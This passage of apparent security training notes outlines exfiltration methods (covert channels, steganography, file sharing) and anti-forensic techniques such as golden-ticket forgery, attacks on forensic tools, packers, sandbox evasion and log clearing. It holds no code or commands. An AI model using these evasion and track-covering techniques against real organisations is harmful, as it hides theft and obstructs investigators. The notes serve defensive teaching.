- May be prevented by encryption services.
- Not always feasible; attacker may be able to decrypt data.
- Attackers use stealth techniques to avoid notice during exfiltration.

Covert Channels

- Enable an attacker to exfiltrate data through unconventional means.

- The exfiltration stays hidden because security controls can't anticipate the channel.
- Examples:
o Transmitting data over a port the firewall doesn't block.
o Concealing data in TCP/IP headers to evade signature analysis.
o Breaking data up into multiple packets to evade signature analysis.
o Transmitting data over a shared resource not commonly used in communication.
o Transmitting encrypted data.
- Advanced IDSs may detect this behavior, but still difficult to predict all channels.
- Not feasible to manually store and analyze all outbound traffic data.

Steganography

- The hiding of information in other media.

- Human eye and many programs can't tell the difference.
- Can help attackers evade data loss countermeasures.
- Data loss systems will stop a sensitive document attempting to leave the network.
- That same document embedded in a benign image will pass by just fine.
- Data leakage like this can go undetected for a long period of time.
- Organization may not know where the leak is or how to plug it.
File Sharing Services

- Rise of file sharing services makes it difficult to clamp down on outbound traffic.
- Employees may share sensitive files over the Internet for convenience.
- This opens up more channels for the attacker to exfiltrate data over.
- Instead of using a covert channel, the attacker can leak data using a cloud service.
- Data loss systems won't be able to detect illegitimate vs. legitimate use.
- Attacker can open up their own file share and just drop the files in.

Anti-forensics
Disrupting a forensic investigation by:

o Negatively affecting evidence.

o Making analysis more difficult.
o Deceiving investigators.
- Reasons for anti-forensics:
o To escape notice during an ongoing attack.
o To eliminate the attacker as a suspect after an attack.
o To frame another person for the attack.
o To waste the organization's time and money.
- Anti-forensics exploits weaknesses in:
o Computer systems.
o Forensic tools.
o Human investigators.
Golden Ticket and Anti-Forensics

- Forged Kerberos tickets were often logged with an invalid domain.

- Detection of golden tickets was easier with this anomaly.
- Newer golden tickets are generated with correct NetBIOS name in domain field.
- This makes it harder for automated forensic tools to detect forged Kerberos tickets.
- Investigator may be unable to ascertain how a domain controller was compromised.

Buffer Overflows

- A more direct attack: cause the forensic tool to hang or crash.

- Investigator examines a malicious file, which initiates a DoS condition.
- Difficult to predict what files could contain the malicious code.
- Leads to frustration and lost productivity for the investigator.
- Examples:
o An opened document creates an infinite loop in memory by exploiting DLLs.
o Attacker can spray the heap and force the tool to execute malicious code on the heap when bitmaps
are opened.
- Most forensic tools have patched these vulnerabilities.
- Attacker can still exploit a toolkit that the investigator fails to update.

Memory Residents

- Memory residents exist in memory even after application has terminated.

- Usually reserved for OS files or common apps, but less common these days.
- Malware becomes memory resident to evade detection and stay engaged.
- Malware residents may slip by an investigation.
- The malware remains in memory, ready to execute if certain conditions are met.
- Modern forensic tools can scan memory for anomalies.
Program Packers

- Method of compression:
o Executable is mostly compressed.
o Rest includes code to decompress executable.
o All combines into a single executable.
o When run, the entire code is decompressed before executing.
- Advantages:
o Reduces file size.
o Slows reverse engineering of proprietary software.
- Malware using this technique can obfuscate its existence.
- Anti-malware solutions may not be able to detect packed malware accurately.
- While packed, malware can modify its signatures to make detection difficult.
- Can be mitigated by unpacking the malware in a sandbox.

VM and Sandbox Detection

- Sandboxing puts malware in an isolated environment for analysis.

- Runs on a VM so live systems are not affected.
- Malware detects sandboxes by:
o Delaying executing of malicious code.
o Exploiting zero-day vulnerabilities.
- Once it detects a sandbox, malware can respond by:
o Staying dormant until detecting human-based usage patterns.
o Running trivial computations to trick the sandbox into thinking it's benign.
o Exhibiting malicious behavior only between system calls.
Covering Tracks

- Clearing event logs with an exploit program.

- Clearing discrete event log entries.
- Changing event log entries.
- Erasing command line history.
- Shredding files or erasing data securely.
- Using any of the previously mentioned anti-forensic techniques, like ADS.
-